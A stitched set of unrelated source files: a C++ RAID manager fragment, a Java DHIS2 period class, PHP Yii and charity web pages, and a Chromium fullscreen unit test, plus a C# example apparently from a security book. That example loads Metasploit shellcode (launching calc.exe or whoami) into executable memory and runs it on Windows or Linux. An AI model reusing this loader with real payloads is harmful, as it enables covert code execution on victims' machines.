retVal = rtnIDfromList(logList,fromEng_P,toEng_P,0);
break;
// Create a new absent object
case MSG_ABS_NEW_OBJECT:
retVal = createArtificial(fromEng_P,toEng_P);
break;
default:
// Call base class event handler
retVal = dptObject_C::handleMessage(message,fromEng_P,toEng_P);
break;
} // end switch
return (retVal);
}
//dptSCSImgr_C::handleMessage() - end
//Function - dptSCSImgr_C::newConfigPhy() - start
//===========================================================================
//
//Description:
//
// This function attempts to create a new physical object from
//the specified configuration data.
//
//Parameters:
//
//Return Value:
//
//Global Variables Affected:
//
//Remarks: (Side effects, Assumptions, Warnings...)
//
//
//---------------------------------------------------------------------------
void dptSCSImgr_C::newConfigPhy(uSHORT objType,dptBuffer_S *toEng_P)
{
dptObject_C *obj_P = (dptObject_C *) newObject(objType);
if (obj_P!=NULL) {
obj_P->setInfo(toEng_P,1);
enterPhy(obj_P);
}
}
//dptSCSImgr_C::newConfigPhy() - end
| barak/raidutils | raideng/scsi_mgr.cpp | C++ | bsd-3-clause | 15,972 |
using System;
using System.Runtime.InteropServices;
namespace ch12_crossplatform_metasploit_payloads
{
class MainClass
{
[DllImport("kernel32")]
static extern IntPtr VirtualAlloc(IntPtr ptr, IntPtr size, IntPtr type, IntPtr mode);
[UnmanagedFunctionPointer(CallingConvention.Winapi)]
delegate void WindowsRun();
[DllImport("libc")]
static extern IntPtr mprotect(IntPtr ptr, IntPtr length, IntPtr protection);
[DllImport("libc")]
static extern IntPtr posix_memalign(ref IntPtr ptr, IntPtr alignment, IntPtr size);
[DllImport("libc")]
static extern void free(IntPtr ptr);
[UnmanagedFunctionPointer(CallingConvention.Cdecl)]
delegate void LinuxRun();
public static void Main(string[] args)
{
OperatingSystem os = Environment.OSVersion;
bool x86 = (IntPtr.Size == 4);
byte[] payload;
if (os.Platform == PlatformID.Win32Windows || os.Platform == PlatformID.Win32NT)
{
if (!x86)
/*
* windows/x64/exec - 276 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
* CMD=calc.exe
*/
payload = new byte[] {
0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc0, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52,
0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48,
0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9,
0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41,
0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48,
0x01, 0xd0, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01,
0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48,
0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0,
0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c,
0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0,
0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04,
0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59,
0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48,
0x8b, 0x12, 0xe9, 0x57, 0xff, 0xff, 0xff, 0x5d, 0x48, 0xba, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x8d, 0x01, 0x01, 0x00, 0x00, 0x41, 0xba, 0x31, 0x8b, 0x6f,
0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x41, 0xba, 0xa6, 0x95, 0xbd, 0x9d, 0xff,
0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb,
0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x63, 0x61, 0x6c,
0x63, 0x2e, 0x65, 0x78, 0x65, 0x00 };
else
/*
* windows/exec - 200 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
* CMD=calc.exe
*/
payload = new byte[] {
0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30,
0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff,
0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2,
0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85,
0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3,
0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d,
0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58,
0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b,
0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff,
0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x6a, 0x01, 0x8d, 0x85, 0xb9, 0x00,
0x00, 0x00, 0x50, 0x68, 0x31, 0x8b, 0x6f, 0x87, 0xff, 0xd5, 0xbb, 0xf0, 0xb5, 0xa2, 0x56,
0x68, 0xa6, 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x3c, 0x06, 0x7c, 0x0a, 0x80, 0xfb, 0xe0, 0x75,
0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 0x00, 0x53, 0xff, 0xd5, 0x63, 0x61, 0x6c, 0x63,
0x2e, 0x65, 0x78, 0x65, 0x00 };
IntPtr ptr = VirtualAlloc(IntPtr.Zero, (IntPtr)payload.Length, (IntPtr)0x1000, (IntPtr)0x40);
Marshal.Copy(payload, 0, ptr, payload.Length);
WindowsRun r = (WindowsRun)Marshal.GetDelegateForFunctionPointer(ptr, typeof(WindowsRun));
r();
}
else if ((int)os.Platform == 4 || (int)os.Platform == 6 || (int)os.Platform == 128) //linux
{
if (!x86)
/*
* linux/x64/exec - 55 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependSetresgid=false, PrependSetregid=false,
* PrependSetgid=false, PrependChrootBreak=false,
* AppendExit=false, CMD=/usr/bin/whoami
*/
payload = new byte[] {
0x6a, 0x3b, 0x58, 0x99, 0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53,
0x48, 0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8, 0x10, 0x00,
0x00, 0x00, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x77, 0x68, 0x6f, 0x61,
0x6d, 0x69, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05 };
else
/*
* linux/x86/exec - 51 bytes
* http://www.metasploit.com
* VERBOSE=false, PrependSetresuid=false,
* PrependSetreuid=false, PrependSetuid=false,
* PrependSetresgid=false, PrependSetregid=false,
* PrependSetgid=false, PrependChrootBreak=false,
* AppendExit=false, CMD=/usr/bin/whoami
*/
payload = new byte[] {
0x6a, 0x0b, 0x58, 0x99, 0x52, 0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68,
0x00, 0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x10, 0x00, 0x00, 0x00, 0x2f,
0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x77, 0x68, 0x6f, 0x61, 0x6d, 0x69, 0x00,
0x57, 0x53, 0x89, 0xe1, 0xcd, 0x80 };
IntPtr ptr = IntPtr.Zero;
IntPtr success;
bool freeMe = false;
try
{
int pagesize = 4096;
IntPtr length = (IntPtr)payload.Length;
success = posix_memalign(ref ptr, (IntPtr)32, length);
if (success != IntPtr.Zero)
{
Console.WriteLine("Bail! memalign failed: " + success);
return;
}
freeMe = true;
IntPtr alignedPtr = (IntPtr)((int)ptr & ~(pagesize - 1)); //get page boundary
IntPtr mode = (IntPtr)(0x04 | 0x02 | 0x01); //RWX -- careful of selinux
success = mprotect(alignedPtr, (IntPtr)32, mode);
if (success != IntPtr.Zero)
{
int err = Marshal.GetLastWin32Error();
Console.WriteLine("Bail! mprotect failed: " + err);
return;
}
Marshal.Copy(payload, 0, ptr, payload.Length);
LinuxRun r = (LinuxRun)Marshal.GetDelegateForFunctionPointer(ptr, typeof(LinuxRun));
r();
}
finally
{
if (freeMe)
free(ptr);
}
}
}
}
}
| brandonprry/gray_hat_csharp_code | ch4_crossplatform_metasploit_payloads/Program.cs | C# | bsd-3-clause | 7,542 |
package org.hisp.dhis.period;
/*
* Copyright (c) 2004-2015, University of Oslo
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of the HISP project nor the names of its contributors may
* be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
import com.google.common.collect.Lists;
import org.hisp.dhis.calendar.Calendar;
import org.hisp.dhis.calendar.DateTimeUnit;
import java.util.Date;
import java.util.List;
/**
* @author Lars Helge Overland
*/
public abstract class FinancialPeriodType
extends CalendarPeriodType
{
/**
* Determines if a de-serialized file is compatible with this class.
*/
private static final long serialVersionUID = 2649990007010207631L;
public static final int FREQUENCY_ORDER = 365;
// -------------------------------------------------------------------------
// Abstract methods
// -------------------------------------------------------------------------
protected abstract int getBaseMonth();
// -------------------------------------------------------------------------
// PeriodType functionality
// -------------------------------------------------------------------------
@Override
public Period createPeriod( DateTimeUnit dateTimeUnit, Calendar calendar )
{
boolean past = dateTimeUnit.getMonth() >= (getBaseMonth() + 1);
if ( !past )
{
dateTimeUnit = getCalendar().minusYears( dateTimeUnit, 1 );
}
dateTimeUnit.setMonth( getBaseMonth() + 1 );
dateTimeUnit.setDay( 1 );
DateTimeUnit start = new DateTimeUnit( dateTimeUnit );
DateTimeUnit end = new DateTimeUnit( dateTimeUnit );
end = getCalendar().plusYears( end, 1 );
end = getCalendar().minusDays( end, 1 );
return toIsoPeriod( start, end, calendar );
}
@Override
public int getFrequencyOrder()
{
return FREQUENCY_ORDER;
}
// -------------------------------------------------------------------------
// CalendarPeriodType functionality
// -------------------------------------------------------------------------
@Override
public Period getNextPeriod( Period period, Calendar calendar )
{
DateTimeUnit dateTimeUnit = createLocalDateUnitInstance( period.getStartDate(), calendar );
dateTimeUnit = calendar.plusYears( dateTimeUnit, 1 );
return createPeriod( dateTimeUnit, calendar );
}
@Override
public Period getPreviousPeriod( Period period, Calendar calendar )
{
DateTimeUnit dateTimeUnit = createLocalDateUnitInstance( period.getStartDate(), calendar );
dateTimeUnit = calendar.minusYears( dateTimeUnit, 1 );
return createPeriod( dateTimeUnit, calendar );
}
/**
* Generates financial yearly periods for the last 5, current and next 5
* financial years.
*/
@Override
public List<Period> generatePeriods( DateTimeUnit dateTimeUnit )
{
Calendar cal = getCalendar();
boolean past = dateTimeUnit.getMonth() >= (getBaseMonth() + 1);
List<Period> periods = Lists.newArrayList();
dateTimeUnit = cal.minusYears( dateTimeUnit, past ? 5 : 6 );
dateTimeUnit.setMonth( getBaseMonth() + 1 );
dateTimeUnit.setDay( 1 );
Calendar calendar = getCalendar();
for ( int i = 0; i < 11; i++ )
{
periods.add( createPeriod( dateTimeUnit, cal ) );
dateTimeUnit = calendar.plusYears( dateTimeUnit, 1 );
}
return periods;
}
/**
* Generates the last 5 financial years where the last one is the financial
* year which the given date is inside.
*/
@Override
public List<Period> generateRollingPeriods( Date date )
{
return generateLast5Years( date );
}
@Override
public List<Period> generateRollingPeriods( DateTimeUnit dateTimeUnit )
{
return generateLast5Years( getCalendar().toIso( dateTimeUnit ).toJdkDate() );
}
@Override
public List<Period> generateLast5Years( Date date )
{
Calendar cal = getCalendar();
DateTimeUnit dateTimeUnit = createLocalDateUnitInstance( date, cal );
boolean past = dateTimeUnit.getMonth() >= (getBaseMonth() + 1);
List<Period> periods = Lists.newArrayList();
dateTimeUnit = cal.minusYears( dateTimeUnit, past ? 4 : 5 );
dateTimeUnit.setMonth( getBaseMonth() + 1 );
dateTimeUnit.setDay( 1 );
for ( int i = 0; i < 5; i++ )
{
periods.add( createPeriod( dateTimeUnit, cal ) );
dateTimeUnit = cal.plusYears( dateTimeUnit, 1 );
}
return periods;
}
@Override
public Date getRewindedDate( Date date, Integer rewindedPeriods )
{
Calendar cal = getCalendar();
date = date != null ? date : new Date();
rewindedPeriods = rewindedPeriods != null ? rewindedPeriods : 1;
DateTimeUnit dateTimeUnit = createLocalDateUnitInstance( date, cal );
dateTimeUnit = cal.minusYears( dateTimeUnit, rewindedPeriods );
return cal.toIso( dateTimeUnit ).toJdkDate();
}
}
| kakada/dhis2 | dhis-api/src/main/java/org/hisp/dhis/period/FinancialPeriodType.java | Java | bsd-3-clause | 6,505 |
<?php
use yii\helpers\Html;
use yii\widgets\ActiveForm;
/* @var $this yii\web\View */
/* @var $model app\models\ClinicaFoneSearch */
/* @var $form yii\widgets\ActiveForm */
?>
<div class="clinica-fone-search">
<?php $form = ActiveForm::begin([
'action' => ['index'],
'method' => 'get',
]); ?>
<?= $form->field($model, 'clinica') ?>
<?= $form->field($model, 'sequencia') ?>
<?= $form->field($model, 'principal') ?>
<?= $form->field($model, 'fone') ?>
<?= $form->field($model, 'obs') ?>
<?php // echo $form->field($model, 'ativo') ?>
<div class="form-group">
<?= Html::submitButton('Search', ['class' => 'btn btn-primary']) ?>
<?= Html::resetButton('Reset', ['class' => 'btn btn-default']) ?>
</div>
<?php ActiveForm::end(); ?>
</div>
| baccaglini/labvet | views/clinica-fone/_search.php | PHP | bsd-3-clause | 822 |
<?
$_in_help_content_page=True;
include('../_header.php');
?>
<div >
<h1>About</h1>
<h2><a name="history"></a>History</h2>
<p>Paxtoncrafts Charitable Trust was formed in 2000 after a favourite uncle suffered a stroke, robbing him of his speech and the ability to read and write. His intellect was unimpaired, but he found it very frustrating being unable to communicate to friends and family. </p>
<p>Several of our family had careers in the IT industry so we were surprised to discover that technology at this time was of little help. Communication devices were available, but very expensive, which meant speech and language therapists rarely encountered them and had little knowledge of this area. Nor was there any formal assessment process that would show whether a particular device was suitable. </p>
<p>Therapists had low expectations of Uncle Ray's future ability to communicate but this was more about the lack of tools and options at their disposal, and not his potential or motivation.</p>
<p>He resigned himself, good-naturedly, in his final few years to communicating with us in his own form of sign language.</p>
<p>In recognising this to be a nationwide, even global problem, it seemed appropriate to do some thing about it. Garry and Liz Paxton, as committed Christians, formed the charity in order to address this need, with Garry leaving his IT career to move full time into the field of Augmentative and Alternative Communication. </p>
<p>Supported by trustees and volunteers with specialist skills in the special needs sector, many bespoke speech and communication programs were created for elderly patients who had suffered a stroke (and had been referred to us by our local speech and language department) while our work at Southview Special school in Essex resulted in our working alongside youngsters with conditions such as cerebral palsy. We developed communication tools related to their social communication needs but additionally the curriculum requirements for each Key Stage in dialogue with teaching staff.</p>
<p>We have also worked closely with the Revival Centre, a children's
rehabilitation centre in Ukraine, which is 50 miles from the site of the
Chernobyl nuclear disaster. Two thousand children a year are treated
here, many born with disabilities arising from the radiation their parents
acquired in 1986. Working with neurologists, we have developed a system
for producing communication charts for the children which they can take
home (few people can afford PCs or communication devices). The same team
in Ukraine has now implemented this at the main geriatric hospital in
Chernigiv, where adult stroke patients take home their own tailored
communication book. The intention is to implement this across all
relevant Ukrainian hospitals</p>
<p>Straight Street Ltd was formed to own the IPR and copyright of all the charity's computer products.
While all our computer programs are free, we found we often had to buy a symbol set on behalf of each client. The lack of a free symbol set became an obstacle to sharing our products more widely as this is a huge expense for a small charity, limiting the numbers of people we could reach. </p>
<p>This, combined with the increasing bureaucracy required to run a UK Registered charity, the Trustees decided in 2007 that the wider work of the charity (which focussed on helping individuals locally) would be wound down. Instead, following a substantial grant, all our efforts would be concentrated on developing the symbol set, which we believe will have a much wider reach and a global impact. Our symbol set is now being translated into other languages. </p>
<h2><a name="funding"></a>Our Funding</h2>
<p>To make our products free, we decided to set up Paxtoncrafts Charitable Trust and obtain grants to fund our work. The development of a symbol set is time-consuming and costly, but other providers of symbol sets use the traditional approach of setting up a business and selling the symbols to fund the development.</p>
<p>If you wish to make a contribution to our efforts, please <a href="/contact.php?subject=Donation">contact us</a> the Trustees at</p>
<p>
</p>
<a href='../help.php'>Back to Help page</a>
</div>
</div>
<?
include('../_footer.php');
?> | straight-street/straight-street | Helpfiles/about.php | PHP | bsd-3-clause | 4,326 |
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "build/build_config.h"
#include "chrome/browser/ui/browser.h"
#include "chrome/browser/ui/browser_tabstrip.h"
#include "chrome/browser/ui/fullscreen/fullscreen_controller.h"
#include "chrome/browser/ui/fullscreen/fullscreen_controller_state_test.h"
#include "chrome/test/base/browser_with_test_window_test.h"
#include "content/public/browser/web_contents.h"
#include "content/public/common/url_constants.h"
#include "testing/gtest/include/gtest/gtest.h"
// The FullscreenControllerStateUnitTest unit test suite exhastively tests
// the FullscreenController through all permutations of events. The behavior
// of the BrowserWindow is mocked via FullscreenControllerTestWindow.
//
// FullscreenControllerStateInteractiveTest is an interactive test suite
// used to verify that the FullscreenControllerTestWindow models the behavior
// of actual windows accurately. The interactive tests are too flaky to run
// on infrastructure, and so those tests are disabled. Run them with:
// interactive_ui_tests
// --gtest_filter="FullscreenControllerStateInteractiveTest.*"
// --gtest_also_run_disabled_tests
// A BrowserWindow used for testing FullscreenController. ----------------------
class FullscreenControllerTestWindow : public TestBrowserWindow {
public:
// Simulate the window state with an enumeration.
enum WindowState {
NORMAL,
FULLSCREEN,
// No TO_ state for METRO_SNAP, the windows implementation is synchronous.
METRO_SNAP,
TO_NORMAL,
TO_FULLSCREEN,
};
FullscreenControllerTestWindow();
virtual ~FullscreenControllerTestWindow() {}
// BrowserWindow Interface:
virtual void EnterFullscreen(const GURL& url,
FullscreenExitBubbleType type) OVERRIDE;
virtual void EnterFullscreen();
virtual void ExitFullscreen() OVERRIDE;
virtual bool IsFullscreen() const OVERRIDE;
#if defined(OS_WIN)
virtual void SetMetroSnapMode(bool enable) OVERRIDE;
virtual bool IsInMetroSnapMode() const OVERRIDE;
#endif
#if defined(OS_MACOSX)
virtual void EnterFullscreenWithChrome() OVERRIDE;
virtual bool IsFullscreenWithChrome() OVERRIDE;
virtual bool IsFullscreenWithoutChrome() OVERRIDE;
#endif
static const char* GetWindowStateString(WindowState state);
WindowState state() const { return state_; }
void set_browser(Browser* browser) { browser_ = browser; }
void set_reentrant(bool value) { reentrant_ = value; }
bool reentrant() const { return reentrant_; }
// Simulates the window changing state.
void ChangeWindowFullscreenState();
// Calls ChangeWindowFullscreenState() if |reentrant_| is true.
void ChangeWindowFullscreenStateIfReentrant();
private:
WindowState state_;
bool mac_with_chrome_mode_;
Browser* browser_;
// Causes reentrant calls to be made by calling
// browser_->WindowFullscreenStateChanged() from the BrowserWindow
// interface methods.
bool reentrant_;
};
FullscreenControllerTestWindow::FullscreenControllerTestWindow()
: state_(NORMAL),
mac_with_chrome_mode_(false),
browser_(NULL),
reentrant_(false) {
}
void FullscreenControllerTestWindow::EnterFullscreen(
const GURL& url, FullscreenExitBubbleType type) {
EnterFullscreen();
}
void FullscreenControllerTestWindow::EnterFullscreen() {
mac_with_chrome_mode_ = false;
if (!IsFullscreen()) {
state_ = TO_FULLSCREEN;
ChangeWindowFullscreenStateIfReentrant();
}
}
void FullscreenControllerTestWindow::ExitFullscreen() {
if (IsFullscreen()) {
state_ = TO_NORMAL;
mac_with_chrome_mode_ = false;
ChangeWindowFullscreenStateIfReentrant();
}
}
bool FullscreenControllerTestWindow::IsFullscreen() const {
#if defined(OS_MACOSX)
return state_ == FULLSCREEN || state_ == TO_FULLSCREEN;
#else
return state_ == FULLSCREEN || state_ == TO_NORMAL;
#endif
}
#if defined(OS_WIN)
void FullscreenControllerTestWindow::SetMetroSnapMode(bool enable) {
if (enable != IsInMetroSnapMode()) {
if (enable)
state_ = METRO_SNAP;
else
state_ = NORMAL;
}
ChangeWindowFullscreenStateIfReentrant();
}
bool FullscreenControllerTestWindow::IsInMetroSnapMode() const {
return state_ == METRO_SNAP;
}
#endif
#if defined(OS_MACOSX)
void FullscreenControllerTestWindow::EnterFullscreenWithChrome() {
EnterFullscreen();
mac_with_chrome_mode_ = true;
}
bool FullscreenControllerTestWindow::IsFullscreenWithChrome() {
return IsFullscreen() && mac_with_chrome_mode_;
}
bool FullscreenControllerTestWindow::IsFullscreenWithoutChrome() {
return IsFullscreen() && !mac_with_chrome_mode_;
}
#endif
// static
const char* FullscreenControllerTestWindow::GetWindowStateString(
WindowState state) {
switch (state) {
case NORMAL:
return "NORMAL";
case FULLSCREEN:
return "FULLSCREEN";
case METRO_SNAP:
return "METRO_SNAP";
case TO_FULLSCREEN:
return "TO_FULLSCREEN";
case TO_NORMAL:
return "TO_NORMAL";
default:
NOTREACHED() << "No string for state " << state;
return "WindowState-Unknown";
}
}
void FullscreenControllerTestWindow::ChangeWindowFullscreenState() {
// Several states result in "no operation" intentionally. The tests
// assume that all possible states and event pairs can be tested, even
// though window managers will not generate all of these.
switch (state_) {
case NORMAL:
break;
case FULLSCREEN:
break;
case METRO_SNAP:
break;
case TO_FULLSCREEN:
state_ = FULLSCREEN;
break;
case TO_NORMAL:
state_ = NORMAL;
break;
default:
NOTREACHED();
}
// Emit a change event from every state to ensure the Fullscreen Controller
// handles it in all circumstances.
browser_->WindowFullscreenStateChanged();
}
void FullscreenControllerTestWindow::ChangeWindowFullscreenStateIfReentrant() {
if (reentrant_)
ChangeWindowFullscreenState();
}
// Unit test fixture testing Fullscreen Controller through its states. ---------
class FullscreenControllerStateUnitTest : public BrowserWithTestWindowTest,
public FullscreenControllerStateTest {
public:
FullscreenControllerStateUnitTest();
// FullscreenControllerStateTest:
virtual void SetUp() OVERRIDE;
virtual void ChangeWindowFullscreenState() OVERRIDE;
virtual const char* GetWindowStateString() OVERRIDE;
virtual void VerifyWindowState() OVERRIDE;
protected:
// FullscreenControllerStateTest:
virtual bool ShouldSkipStateAndEventPair(State state, Event event) OVERRIDE;
virtual void TestStateAndEvent(State state,
Event event,
bool reentrant) OVERRIDE;
virtual Browser* GetBrowser() OVERRIDE;
FullscreenControllerTestWindow* window_;
};
FullscreenControllerStateUnitTest::FullscreenControllerStateUnitTest ()
: window_(NULL) {
}
void FullscreenControllerStateUnitTest::SetUp() {
window_ = new FullscreenControllerTestWindow();
set_window(window_); // BrowserWithTestWindowTest takes ownership.
BrowserWithTestWindowTest::SetUp();
window_->set_browser(browser());
}
void FullscreenControllerStateUnitTest::ChangeWindowFullscreenState() {
window_->ChangeWindowFullscreenState();
}
const char* FullscreenControllerStateUnitTest::GetWindowStateString() {
return FullscreenControllerTestWindow::GetWindowStateString(window_->state());
}
void FullscreenControllerStateUnitTest::VerifyWindowState() {
switch (state_) {
case STATE_NORMAL:
EXPECT_EQ(FullscreenControllerTestWindow::NORMAL,
window_->state()) << GetAndClearDebugLog();
break;
case STATE_BROWSER_FULLSCREEN_NO_CHROME:
EXPECT_EQ(FullscreenControllerTestWindow::FULLSCREEN,
window_->state()) << GetAndClearDebugLog();
break;
case STATE_BROWSER_FULLSCREEN_WITH_CHROME:
EXPECT_EQ(FullscreenControllerTestWindow::FULLSCREEN,
window_->state()) << GetAndClearDebugLog();
break;
#if defined(OS_WIN)
case STATE_METRO_SNAP:
EXPECT_EQ(FullscreenControllerTestWindow::METRO_SNAP,
window_->state()) << GetAndClearDebugLog();
break;
#endif
case STATE_TAB_FULLSCREEN:
EXPECT_EQ(FullscreenControllerTestWindow::FULLSCREEN,
window_->state()) << GetAndClearDebugLog();
break;
case STATE_TAB_BROWSER_FULLSCREEN:
EXPECT_EQ(FullscreenControllerTestWindow::FULLSCREEN,
window_->state()) << GetAndClearDebugLog();
break;
case STATE_TAB_BROWSER_FULLSCREEN_CHROME:
EXPECT_EQ(FullscreenControllerTestWindow::FULLSCREEN,
window_->state()) << GetAndClearDebugLog();
break;
case STATE_TO_NORMAL:
EXPECT_EQ(FullscreenControllerTestWindow::TO_NORMAL,
window_->state()) << GetAndClearDebugLog();
break;
case STATE_TO_BROWSER_FULLSCREEN_NO_CHROME:
EXPECT_EQ(FullscreenControllerTestWindow::TO_FULLSCREEN,
window_->state()) << GetAndClearDebugLog();
break;
case STATE_TO_BROWSER_FULLSCREEN_WITH_CHROME:
EXPECT_EQ(FullscreenControllerTestWindow::TO_FULLSCREEN,
window_->state()) << GetAndClearDebugLog();
break;
case STATE_TO_TAB_FULLSCREEN:
EXPECT_EQ(FullscreenControllerTestWindow::TO_FULLSCREEN,
window_->state()) << GetAndClearDebugLog();
break;
default:
NOTREACHED() << GetAndClearDebugLog();
}
FullscreenControllerStateTest::VerifyWindowState();
}
bool FullscreenControllerStateUnitTest::ShouldSkipStateAndEventPair(
State state, Event event) {
#if defined(OS_MACOSX)
// TODO(scheib) Toggle, Window Event, Toggle, Toggle on Mac as exposed by
// test *.STATE_TO_NORMAL__TOGGLE_FULLSCREEN runs interactively and exits to
// Normal. This doesn't appear to be the desired result, and would add
// too much complexity to mimic in our simple FullscreenControllerTestWindow.
// http://crbug.com/156968
if ((state == STATE_TO_NORMAL ||
state == STATE_TO_BROWSER_FULLSCREEN_NO_CHROME ||
state == STATE_TO_TAB_FULLSCREEN) &&
event == TOGGLE_FULLSCREEN)
return true;
#endif
return FullscreenControllerStateTest::ShouldSkipStateAndEventPair(state,
event);
}
void FullscreenControllerStateUnitTest::TestStateAndEvent(State state,
Event event,
bool reentrant) {
window_->set_reentrant(reentrant);
FullscreenControllerStateTest::TestStateAndEvent(state, event, reentrant);
}
Browser* FullscreenControllerStateUnitTest::GetBrowser() {
return BrowserWithTestWindowTest::browser();
}
// Tests -----------------------------------------------------------------------
#define TEST_EVENT_INNER(state, event, reentrant, reentrant_id) \
TEST_F(FullscreenControllerStateUnitTest, \
state##__##event##reentrant_id) { \
AddTab(browser(), GURL(chrome::kAboutBlankURL)); \
ASSERT_NO_FATAL_FAILURE(TestStateAndEvent(state, event, reentrant)) \
<< GetAndClearDebugLog(); \
}
// Progress of tests can be examined by inserting the following line:
// LOG(INFO) << GetAndClearDebugLog(); }
#define TEST_EVENT(state, event) \
TEST_EVENT_INNER(state, event, false, ); \
TEST_EVENT_INNER(state, event, true, _Reentrant);
// Soak tests:
// Tests all states with all permutations of multiple events to detect lingering
// state issues that would bleed over to other states.
// I.E. for each state test all combinations of events E1, E2, E3.
//
// This produces coverage for event sequences that may happen normally but
